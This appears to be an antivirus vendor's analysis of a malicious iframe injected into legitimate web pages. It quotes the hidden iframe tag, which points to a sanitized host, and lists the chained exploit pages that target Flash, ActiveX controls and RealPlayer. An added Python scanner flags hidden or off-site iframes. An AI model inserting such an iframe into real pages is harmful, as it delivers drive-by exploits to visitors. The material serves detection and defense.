Symptoms
It currently leads to a Rootkit.Agent.AIWN infection.
Removal instructions:
Please let BitDefender disinfect your files.
Analyzed By
Alexandru Maximciuc, virus researcher
Technical Description:
Detects a type of malicious iframe injected into legitimate web pages.
The iframe tag looks like:
<iframe src=http://sanitized/fxx.htm width=100 height=0>
I'll base this description on a valid site (many of them were sanitized or taken down):
hxxp://www.*******.cn/a114/fxx.htm (please don't access that page in your browser unless you know what you're doing.)
The fxx.htm page contains only a SCRIPT tag, and here the fun begins, with many iframes injected into the page:
* fx.htm - this one tries to exploit a vulnerability in FlashPlayer
* ../a1/ss.htm
* ../a1/MS06014.htm
* ../a1/sina.htm - if Sina Downloader.DLoader.1 ActiveX Control is available
* ../a1/no.htm - if UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control is available
* ../a1/bfyy.htm - if MPS.StormPlayer ActiveX Control is available
* ../a1/GLWORLD.html - for GLIEDown.IEDown.1
* ../a1/real.htm - for RealPlayer IERPCtl.IERPCtl.1 if RealPlayer's version is older than 6.0.14.552 (or it)
* ../a1/real.hTml - if RealPlayer's version is newer than 6.0.14.552
fx.htm is detected as Trojan.Exploit.ANPI and, depending on the browser, leads to Trojan.Exploit.SSX for browsers whose User-Agent contains "msie", and to Trojan.JS.Redirector.E for the remaining browsers. This eventually leads to some Flash files detected as Exploit.SWF.Gen.
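The injected tag shown above has two traits a defender can key on: it is invisible (height=0) and it pulls content from a host other than the compromised site. The following scanner is an added example, not BitDefender's detection code; it parses an HTML document and reports iframes with either trait, and the sample page and the `page_host` argument (the hostname the page was served from) are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # attrs arrives as (name, value) pairs; unquoted values like height=0 parse fine
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_zero(value):
    """True when a width/height attribute collapses to 0 (e.g. '0', '0px')."""
    digits = "".join(ch for ch in value.strip() if ch.isdigit())
    return digits != "" and int(digits) == 0


def find_suspicious_iframes(html, page_host):
    """Return (src, reasons) for iframes that are hidden or load from a host other than page_host."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        if is_zero(attrs.get("height", "")) or is_zero(attrs.get("width", "")):
            reasons.append("zero-size")      # invisible frame, as in the injected tag above
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            reasons.append("off-site src")   # content pulled from a foreign host
        if reasons:
            hits.append((src, reasons))
    return hits


# Constructed sample: a legitimate page with an injected frame appended to it.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="/embed/video" width="640" height="360"></iframe>
<iframe src=http://sanitized/fxx.htm width=100 height=0>
</body></html>"""
```

Running `find_suspicious_iframes(SAMPLE_PAGE, "www.example.com")` flags only the injected frame; the site's own video embed, which is visible and same-origin, is left alone.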